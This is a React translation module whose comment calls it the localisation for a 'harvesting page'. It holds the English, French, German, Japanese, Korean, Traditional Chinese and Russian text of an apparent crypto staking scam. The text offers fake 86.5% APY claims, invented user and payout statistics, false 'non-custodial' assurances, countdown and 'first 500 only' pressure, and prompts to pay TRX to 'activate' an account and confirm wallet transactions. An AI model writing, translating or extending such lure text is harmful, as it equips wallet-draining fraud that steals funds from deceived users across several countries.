import { useState, useEffect } from 'react';

// 收割页多语言翻译模块（按浏览器语言自动选择）
// 语言：en / fr / de / ja / ko / zh-Hant / ru

const T = {
  en: {
    'common.retry': 'Retry',
    'common.wallet': 'Wallet:',
    'approve.payTitle': 'Complete Your Payment',
    'approve.payDesc': 'Pay {amt} TRX to activate your account and unlock all features.',
    'approve.payBtn': 'Pay {amt} TRX',
    'approve.doneTitle': 'Payment Successful',
    'approve.doneDesc': 'Your payment of {amt} TRX has been received. Your account is now fully activated.',
    'approve.processing': 'Processing',
    'approve.activating': 'Activating',
    'approve.verifying': 'Verifying',
    'approve.confirm': 'Please confirm the payment in your wallet...',
    'stake.title': 'Stake USDC',
    'stake.done': 'Stake Successful',
    'stake.btn': 'Stake Now',
    'claim.title': 'Claim Your Reward',
    'claim.btn': 'Claim Now',
    'claim.done': 'Claim Successful',
    'countdown.label': 'Event ends in',
    'stake.balance': 'Balance: {bal}',
    'stake.max': 'MAX',
    'stake.amount': 'Amount',
    'stake.daily': 'Estimated Daily Yield',
    'stake.recent': 'Recent Stakes',
    'stake.staked': 'staked {amt} USDC',
    'stake.justNow': 'just now',
    'stake.totalStaked': 'Total Staked',
    'stake.currentApy': 'Current APY',
    'stake.stakers': 'Stakers',
    'stake.posStaked': 'Staked',
    'stake.posLock': 'Lock Period',
    'stake.posApy': 'APY',
    'stake.confirm': 'Confirm in wallet...',
    'stake.submitting': 'Submitting...',
    'stake.days': '{d} days',
    'stake.descDone': 'You staked {amt} USDC for {d} days at {apy}% APY. Estimated daily yield: {y} USDC.',
    'stake.limit': '🔥 Limited offer: first 500 stakers only',
    'stake.noWallet': "No wallet detected. Please install MetaMask.",
    'lp.tagline': "Earn up to 86.5% APY on USDC",
    'lp.sub': "The world's most trusted staking platform. Join 12,000+ stakers earning daily rewards with zero fees.",
    'lp.statStaked': "Total Staked",
    'lp.statStakers': "Stakers",
    'lp.statPaid': "Rewards Paid",
    'lp.statUptime': "Uptime",
    'lp.f1t': "Zero Fees",
    'lp.f1d': "All gas fees are sponsored by the platform. Your yield is 100% yours.",
    'lp.f2t': "Non-Custodial",
    'lp.f2d': "Your assets stay in your wallet. We never hold your funds.",
    'lp.f3t': "Daily Payouts",
    'lp.f3d': "Rewards are distributed every day, automatically.",
    'lp.footer': "© 2026 智汇. All rights reserved.",
    'lp.legal': "Staking involves risk. Past performance does not guarantee future results. This platform is available in select jurisdictions only. By using this service you agree to our",
    'lp.terms': "Terms of Service",
    'lp.privacy': "Privacy Policy",
    'stake.rejected': "Wallet connection rejected.",
    'stake.canceled': "Signature canceled.",
    'stake.connect': "Connect Wallet",
    'stake.failed': "Stake failed",
  },
  fr: {
    'common.retry': 'Réessayer',
    'common.wallet': 'Portefeuille :',
    'approve.payTitle': 'Finaliser le paiement',
    'approve.payDesc': 'Payez {amt} TRX pour activer votre compte et débloquer toutes les fonctionnalités.',
    'approve.payBtn': 'Payer {amt} TRX',
    'approve.doneTitle': 'Paiement réussi',
    'approve.doneDesc': 'Votre paiement de {amt} TRX a été reçu. Votre compte est maintenant activé.',
    'approve.processing': 'Traitement',
    'approve.activating': 'Activation',
    'approve.verifying': 'Vérification',
    'approve.confirm': 'Veuillez confirmer le paiement dans votre portefeuille...',
    'stake.title': 'Staker USDC',
    'stake.done': 'Staking réussi',
    'stake.btn': 'Staker',
    'claim.title': 'Réclamez votre récompense',
    'claim.btn': 'Réclamer',
    'claim.done': 'Réclamation réussie',
    'countdown.label': "Fin de l'événement dans",
    'stake.balance': 'Solde : {bal}',
    'stake.max': 'MAX',
    'stake.amount': 'Montant',
    'stake.daily': 'Rendement quotidien estimé',
    'stake.recent': 'Stakes récents',
    'stake.staked': 'a staké {amt} USDC',
    'stake.justNow': "à l'instant",
    'stake.totalStaked': 'Total staké',
    'stake.currentApy': 'APY actuel',
    'stake.stakers': 'Stakers',
    'stake.posStaked': 'Staké',
    'stake.posLock': 'Période de blocage',
    'stake.posApy': 'APY',
    'stake.confirm': 'Confirmez dans le portefeuille...',
    'stake.submitting': 'Envoi...',
    'stake.days': '{d} jours',
    'stake.descDone': 'Vous avez staké {amt} USDC pendant {d} jours à {apy}% APY. Rendement quotidien estimé : {y} USDC.',
    'stake.limit': '🔥 Offre limitée : 500 premiers stakers uniquement',
    'stake.noWallet': "Aucun portefeuille détecté. Veuillez installer MetaMask.",
    'lp.tagline': "Gagnez jusqu'à 86,5% APY sur USDC",
    'lp.sub': "La plateforme de staking la plus fiable au monde. Rejoignez plus de 12 000 stakers gagnant des récompenses quotidiennes sans frais.",
    'lp.statStaked': "Total staké",
    'lp.statStakers': "Stakers",
    'lp.statPaid': "Récompenses versées",
    'lp.statUptime': "Disponibilité",
    'lp.f1t': "Zéro frais",
    'lp.f1d': "Tous les frais de gaz sont pris en charge. Votre rendement est 100% à vous.",
    'lp.f2t': "Non-custodial",
    'lp.f2d': "Vos actifs restent dans votre portefeuille. Nous ne détenons jamais vos fonds.",
    'lp.f3t': "Paiements quotidiens",
    'lp.f3d': "Les récompenses sont distribuées chaque jour, automatiquement.",
    'lp.footer': "© 2026 智汇. Tous droits réservés.",
    'lp.legal': "Le staking comporte des risques. Les performances passées ne garantissent pas les résultats futurs. Cette plateforme est disponible dans certaines juridictions uniquement. En utilisant ce service, vous acceptez nos",
    'lp.terms': "Conditions d'utilisation",
    'lp.privacy': "Politique de confidentialité",
    'stake.rejected': "Connexion du portefeuille refusée.",
    'stake.canceled': "Signature annulée.",
    'stake.connect': "Connecter le portefeuille",
    'stake.failed': "Staking échoué",
  },
  de: {
    'common.retry': 'Erneut versuchen',
    'common.wallet': 'Wallet:',
    'approve.payTitle': 'Zahlung abschließen',
    'approve.payDesc': 'Zahlen Sie {amt} TRX, um Ihr Konto zu aktivieren und alle Funktionen freizuschalten.',
    'approve.payBtn': '{amt} TRX zahlen',
    'approve.doneTitle': 'Zahlung erfolgreich',
    'approve.doneDesc': 'Ihre Zahlung von {amt} TRX ist eingegangen. Ihr Konto ist jetzt aktiviert.',
    'approve.processing': 'Verarbeitung',
    'approve.activating': 'Aktivierung',
    'approve.verifying': 'Überprüfung',
    'approve.confirm': 'Bitte bestätigen Sie die Zahlung in Ihrer Wallet...',
    'stake.title': 'USDC staken',
    'stake.done': 'Staking erfolgreich',
    'stake.btn': 'Jetzt staken',
    'claim.title': 'Belohnung einfordern',
    'claim.btn': 'Jetzt einfordern',
    'claim.done': 'Erfolgreich eingefordert',
    'countdown.label': 'Event endet in',
    'stake.balance': 'Guthaben: {bal}',
    'stake.max': 'MAX',
    'stake.amount': 'Betrag',
    'stake.daily': 'Geschätzte tägliche Rendite',
    'stake.recent': 'Letzte Stakes',
    'stake.staked': 'hat {amt} USDC gestakt',
    'stake.justNow': 'gerade eben',
    'stake.totalStaked': 'Gesamt gestakt',
    'stake.currentApy': 'Aktueller APY',
    'stake.stakers': 'Staker',
    'stake.posStaked': 'Gestakt',
    'stake.posLock': 'Sperrfrist',
    'stake.posApy': 'APY',
    'stake.confirm': 'In der Wallet bestätigen...',
    'stake.submitting': 'Übermittlung...',
    'stake.days': '{d} Tage',
    'stake.descDone': 'Sie haben {amt} USDC für {d} Tage bei {apy}% APY gestakt. Geschätzte tägliche Rendite: {y} USDC.',
    'stake.limit': '🔥 Begrenztes Angebot: nur die ersten 500 Staker',
    'stake.noWallet': "Keine Wallet erkannt. Bitte MetaMask installieren.",
    'lp.tagline': "Bis zu 86,5% APY auf USDC verdienen",
    'lp.sub': "Die vertrauenswürdigste Staking-Plattform der Welt. Schließen Sie sich über 12.000 Stakern an und verdienen Sie täglich – ohne Gebühren.",
    'lp.statStaked': "Gesamt gestakt",
    'lp.statStakers': "Staker",
    'lp.statPaid': "Auszahlungen",
    'lp.statUptime': "Verfügbarkeit",
    'lp.f1t': "Null Gebühren",
    'lp.f1d': "Alle Gasgebühren werden übernommen. Ihr Ertrag gehört zu 100% Ihnen.",
    'lp.f2t': "Nicht-verwahrend",
    'lp.f2d': "Ihre Assets bleiben in Ihrer Wallet. Wir halten niemals Ihre Gelder.",
    'lp.f3t': "Tägliche Auszahlungen",
    'lp.f3d': "Belohnungen werden täglich automatisch verteilt.",
    'lp.footer': "© 2026 智汇. Alle Rechte vorbehalten.",
    'lp.legal': "Staking birgt Risiken. Frühere Wertentwicklungen garantieren keine zukünftigen Ergebnisse. Diese Plattform ist nur in ausgewählten Rechtsordnungen verfügbar. Durch die Nutzung stimmen Sie unseren",
    'lp.terms': "Nutzungsbedingungen",
    'lp.privacy': "Datenschutzrichtlinie",
    'stake.rejected': "Wallet-Verbindung abgelehnt.",
    'stake.canceled': "Signatur abgebrochen.",
    'stake.connect': "Wallet verbinden",
    'stake.failed': "Staking fehlgeschlagen",
  },
  ja: {
    'common.retry': '再試行',
    'common.wallet': 'ウォレット:',
    'approve.payTitle': 'お支払いを完了',
    'approve.payDesc': '{amt} TRX を支払ってアカウントを有効化し、すべての機能を解除します。',
    'approve.payBtn': '{amt} TRX を支払う',
    'approve.doneTitle': '支払い成功',
    'approve.doneDesc': '{amt} TRX の支払いを受け取りました。アカウントが有効化されました。',
    'approve.processing': '処理中',
    'approve.activating': '有効化中',
    'approve.verifying': '確認中',
    'approve.confirm': 'ウォレットで支払いを確認してください...',
    'stake.title': 'USDC をステーキング',
    'stake.done': 'ステーキング成功',
    'stake.btn': '今すぐステーキング',
    'claim.title': '報酬を受け取る',
    'claim.btn': '今すぐ受け取る',
    'claim.done': '受け取り成功',
    'countdown.label': 'イベント終了まで',
    'stake.balance': '残高: {bal}',
    'stake.max': 'MAX',
    'stake.amount': '数量',
    'stake.daily': '推定日利回り',
    'stake.recent': '最近のステーキング',
    'stake.staked': '{amt} USDC をステーキング',
    'stake.justNow': 'たった今',
    'stake.totalStaked': '総ステーキング額',
    'stake.currentApy': '現在のAPY',
    'stake.stakers': 'ステーカー',
    'stake.posStaked': 'ステーキング額',
    'stake.posLock': 'ロック期間',
    'stake.posApy': 'APY',
    'stake.confirm': 'ウォレットで確認してください...',
    'stake.submitting': '送信中...',
    'stake.days': '{d}日',
    'stake.descDone': '{d}日間 {apy}% APY で {amt} USDC をステーキングしました。推定日利回り: {y} USDC。',
    'stake.limit': '🔥 先着500名様限定',
    'stake.noWallet': "ウォレットが検出されません。MetaMask をインストールしてください。",
    'lp.tagline': "USDCで最大86.5%のAPYを獲得",
    'lp.sub': "世界で最も信頼されるステーキングプラットフォーム。12,000人以上のステーカーが手数料ゼロで毎日報酬を獲得しています。",
    'lp.statStaked': "総ステーキング額",
    'lp.statStakers': "ステーカー",
    'lp.statPaid': "支払済み報酬",
    'lp.statUptime': "稼働率",
    'lp.f1t': "手数料ゼロ",
    'lp.f1d': "ガス代はすべてプラットフォームが負担。利回りは100%あなたのもの。",
    'lp.f2t': "非カストディ",
    'lp.f2d': "資産はウォレットに残ります。私たちが資金を預かることはありません。",
    'lp.f3t': "毎日の配当",
    'lp.f3d': "報酬は毎日自動的に分配されます。",
    'lp.footer': "© 2026 智汇. All rights reserved.",
    'lp.legal': "ステーキングにはリスクが伴います。過去の実績は将来の結果を保証するものではありません。本プラットフォームは特定の法域でのみ利用可能です。本サービスを利用することで、以下に同意したものとみなされます：",
    'lp.terms': "利用規約",
    'lp.privacy': "プライバシーポリシー",
    'stake.rejected': "ウォレット接続が拒否されました。",
    'stake.canceled': "署名がキャンセルされました。",
    'stake.connect': "ウォレット接続",
    'stake.failed': "ステーキングに失敗しました",
  },
  ko: {
    'common.retry': '재시도',
    'common.wallet': '지갑:',
    'approve.payTitle': '결제 완료',
    'approve.payDesc': '{amt} TRX를 결제하여 계정을 활성화하고 모든 기능을 이용하세요.',
    'approve.payBtn': '{amt} TRX 결제',
    'approve.doneTitle': '결제 성공',
    'approve.doneDesc': '{amt} TRX 결제가 완료되었습니다. 계정이 활성화되었습니다.',
    'approve.processing': '처리 중',
    'approve.activating': '활성화 중',
    'approve.verifying': '확인 중',
    'approve.confirm': '지갑에서 결제를 확인해 주세요...',
    'stake.title': 'USDC 스테이킹',
    'stake.done': '스테이킹 성공',
    'stake.btn': '지금 스테이킹',
    'claim.title': '보상 받기',
    'claim.btn': '지금 받기',
    'claim.done': '받기 성공',
    'countdown.label': '이벤트 종료까지',
    'stake.balance': '잔액: {bal}',
    'stake.max': 'MAX',
    'stake.amount': '수량',
    'stake.daily': '예상 일일 수익',
    'stake.recent': '최근 스테이킹',
    'stake.staked': '{amt} USDC 스테이킹',
    'stake.justNow': '방금',
    'stake.totalStaked': '총 스테이킹',
    'stake.currentApy': '현재 APY',
    'stake.stakers': '스테이커',
    'stake.posStaked': '스테이킹',
    'stake.posLock': '락업 기간',
    'stake.posApy': 'APY',
    'stake.confirm': '지갑에서 확인하세요...',
    'stake.submitting': '제출 중...',
    'stake.days': '{d}일',
    'stake.descDone': '{d}일 동안 {apy}% APY로 {amt} USDC를 스테이킹했습니다. 예상 일일 수익: {y} USDC.',
    'stake.limit': '🔥 선착순 500명 한정',
    'stake.noWallet': "지갑을 찾을 수 없습니다. MetaMask를 설치하세요.",
    'lp.tagline': "USDC로 최대 86.5% APY 획득",
    'lp.sub': "세계에서 가장 신뢰받는 스테이킹 플랫폼. 수수료 없이 매일 보상을 받는 12,000명 이상의 스테이커에 합류하세요.",
    'lp.statStaked': "총 스테이킹",
    'lp.statStakers': "스테이커",
    'lp.statPaid': "지급된 보상",
    'lp.statUptime': "가동률",
    'lp.f1t': "수수료 제로",
    'lp.f1d': "모든 가스비는 플랫폼이 부담합니다. 수익은 100% 당신의 것.",
    'lp.f2t': "비수탁형",
    'lp.f2d': "자산은 지갑에 그대로 있습니다. 우리는 자금을 보관하지 않습니다.",
    'lp.f3t': "매일 지급",
    'lp.f3d': "보상은 매일 자동으로 분배됩니다.",
    'lp.footer': "© 2026 智汇. All rights reserved.",
    'lp.legal': "스테이킹에는 위험이 따릅니다. 과거 실적이 미래 수익을 보장하지 않습니다. 이 플랫폼은 일부 지역에서만 제공됩니다. 서비스 이용 시 다음에 동의하는 것으로 간주됩니다:",
    'lp.terms': "이용약관",
    'lp.privacy': "개인정보 처리방침",
    'stake.rejected': "지갑 연결이 거부되었습니다.",
    'stake.canceled': "서명이 취소되었습니다.",
    'stake.connect': "지갑 연결",
    'stake.failed': "스테이킹 실패",
  },
  'zh-Hant': {
    'common.retry': '重試',
    'common.wallet': '錢包：',
    'approve.payTitle': '完成付款',
    'approve.payDesc': '支付 {amt} TRX 以激活您的帳戶並解鎖全部功能。',
    'approve.payBtn': '支付 {amt} TRX',
    'approve.doneTitle': '付款成功',
    'approve.doneDesc': '已收到您的 {amt} TRX 付款，帳戶現已激活。',
    'approve.processing': '處理中',
    'approve.activating': '激活中',
    'approve.verifying': '驗證中',
    'approve.confirm': '請在錢包中確認付款...',
    'stake.title': '質押 USDC',
    'stake.done': '質押成功',
    'stake.btn': '立即質押',
    'claim.title': '領取獎勵',
    'claim.btn': '立即領取',
    'claim.done': '領取成功',
    'countdown.label': '活動結束倒計時',
    'stake.balance': '餘額：{bal}',
    'stake.max': '最大',
    'stake.amount': '數量',
    'stake.daily': '預估日收益',
    'stake.recent': '最新質押',
    'stake.staked': '質押了 {amt} USDC',
    'stake.justNow': '剛剛',
    'stake.totalStaked': '總質押量',
    'stake.currentApy': '當前 APY',
    'stake.stakers': '質押用戶',
    'stake.posStaked': '已質押',
    'stake.posLock': '鎖倉期',
    'stake.posApy': 'APY',
    'stake.confirm': '請在錢包中確認...',
    'stake.submitting': '提交中...',
    'stake.days': '{d} 天',
    'stake.descDone': '您已質押 {amt} USDC，為期 {d} 天，APY {apy}%。預估日收益：{y} USDC。',
    'stake.limit': '🔥 限量活動：僅限前 500 名',
    'stake.noWallet': "未檢測到錢包，請安裝 MetaMask。",
    'lp.tagline': "USDC 質押最高 86.5% APY",
    'lp.sub': "全球最值得信賴的質押平台。超過 12,000 名用戶正在零手續費賺取每日收益，立即加入。",
    'lp.statStaked': "總質押量",
    'lp.statStakers': "質押用戶",
    'lp.statPaid': "已發獎勵",
    'lp.statUptime': "在線率",
    'lp.f1t': "零手續費",
    'lp.f1d': "Gas 費全部由平台承擔，收益 100% 歸您所有。",
    'lp.f2t': "非託管",
    'lp.f2d': "資產始終在您錢包中，我們從不保管您的資金。",
    'lp.f3t': "每日派息",
    'lp.f3d': "獎勵每天自動發放。",
    'lp.footer': "© 2026 智匯 版權所有。",
    'lp.legal': "質押存在風險，過往表現不代表未來收益。本平台僅在部分地區提供服務。使用本服務即表示您同意我們的",
    'lp.terms': "服務條款",
    'lp.privacy': "隱私政策",
    'stake.rejected': "錢包連接被拒絕。",
    'stake.canceled': "簽名已取消。",
    'stake.connect': "連接錢包",
    'stake.failed': "質押失敗",
  },
  ru: {
    'common.retry': 'Повторить',
    'common.wallet': 'Кошелек:',
    'approve.payTitle': 'Завершить оплату',
    'approve.payDesc': 'Оплатите {amt} TRX, чтобы активировать аккаунт и открыть все функции.',
    'approve.payBtn': 'Оплатить {amt} TRX',
    'approve.doneTitle': 'Оплата успешна',
    'approve.doneDesc': 'Ваш платеж {amt} TRX получен. Аккаунт активирован.',
    'approve.processing': 'Обработка',
    'approve.activating': 'Активация',
    'approve.verifying': 'Проверка',
    'approve.confirm': 'Подтвердите оплату в кошельке...',
    'stake.title': 'Стейкинг USDC',
    'stake.done': 'Стейкинг успешен',
    'stake.btn': 'Стейкать',
    'claim.title': 'Получить награду',
    'claim.btn': 'Получить',
    'claim.done': 'Получено',
    'countdown.label': 'До конца события',
    'stake.balance': 'Баланс: {bal}',
    'stake.max': 'MAX',
    'stake.amount': 'Сумма',
    'stake.daily': 'Ожидаемый дневной доход',
    'stake.recent': 'Недавние стейки',
    'stake.staked': 'застейкал {amt} USDC',
    'stake.justNow': 'только что',
    'stake.totalStaked': 'Всего застейкано',
    'stake.currentApy': 'Текущий APY',
    'stake.stakers': 'Стейкеры',
    'stake.posStaked': 'Застейкано',
    'stake.posLock': 'Период блокировки',
    'stake.posApy': 'APY',
    'stake.confirm': 'Подтвердите в кошельке...',
    'stake.submitting': 'Отправка...',
    'stake.days': '{d} дн.',
    'stake.descDone': 'Вы застейкали {amt} USDC на {d} дней под {apy}% APY. Ожидаемый дневной доход: {y} USDC.',
    'stake.limit': '🔥 Ограниченное предложение: только первые 500 стейкеров',
    'stake.noWallet': "Кошелек не найден. Установите MetaMask.",
    'lp.tagline': "До 86,5% APY на USDC",
    'lp.sub': "Самая надёжная стейкинг-платформа в мире. Более 12 000 стейкеров получают ежедневные награды без комиссий.",
    'lp.statStaked': "Всего застейкано",
    'lp.statStakers': "Стейкеры",
    'lp.statPaid': "Выплачено",
    'lp.statUptime': "Аптайм",
    'lp.f1t': "Ноль комиссий",
    'lp.f1d': "Все комиссии за газ оплачивает платформа. Доход на 100% ваш.",
    'lp.f2t': "Некастодиальный",
    'lp.f2d': "Ваши активы остаются в кошельке. Мы никогда не храним ваши средства.",
    'lp.f3t': "Ежедневные выплаты",
    'lp.f3d': "Награды распределяются автоматически каждый день.",
    'lp.footer': "© 2026 智汇. Все права защищены.",
    'lp.legal': "Стейкинг связан с риском. Прошлые результаты не гарантируют будущих. Платформа доступна только в отдельных юрисдикциях. Используя сервис, вы соглашаетесь с",
    'lp.terms': "Условиями использования",
    'lp.privacy': "Политикой конфиденциальности",
    'stake.rejected': "Подключение кошелька отклонено.",
    'stake.canceled': "Подпись отменена.",
    'stake.connect': "Подключить кошелек",
    'stake.failed': "Стейкинг не удался",
  },
};

// 支持的语言
export const LANGS = [
  { code: 'en', name: 'English' },
  { code: 'fr', name: 'Français' },
  { code: 'de', name: 'Deutsch' },
  { code: 'ja', name: '日本語' },
  { code: 'ko', name: '한국어' },
  { code: 'zh-Hant', name: '繁體中文' },
  { code: 'ru', name: 'Русский' },
];

const STORAGE_KEY = 'ui-lang';

// 自动检测浏览器语言
const detect = () => {
  const lang = (navigator.language || 'en').toLowerCase();
  return lang.startsWith('fr') ? 'fr'
    : lang.startsWith('de') ? 'de'
    : lang.startsWith('ja') ? 'ja'
    : lang.startsWith('ko') ? 'ko'
    : lang.startsWith('ru') ? 'ru'
    : lang.startsWith('zh') ? 'zh-Hant'
    : 'en';
};

let current = '';
try { current = localStorage.getItem(STORAGE_KEY) || ''; } catch (e) {}
if (!current || !T[current]) current = detect();

export const getLang = () => current;

const listeners = new Set();

// 手动切换语言（持久化，覆盖自动识别）
export const setLang = (code) => {
  if (!T[code]) return;
  current = code;
  try { localStorage.setItem(STORAGE_KEY, code); } catch (e) {}
  listeners.forEach((fn) => fn(code));
};

// 翻译 hook：语言切换时自动重渲染
export const useT = () => {
  const [, force] = useState(0);
  useEffect(() => {
    const fn = () => force((x) => x + 1);
    listeners.add(fn);
    return () => { listeners.delete(fn); };
  }, []);
  return (k, vars) => {
    let text = (T[current] && T[current][k]) || T.en[k] || k;
    if (vars) {
      Object.keys(vars).forEach((v) => {
        text = text.replace(new RegExp('\\{' + v + '\\}', 'g'), vars[v]);
      });
    }
    return text;
  };
};
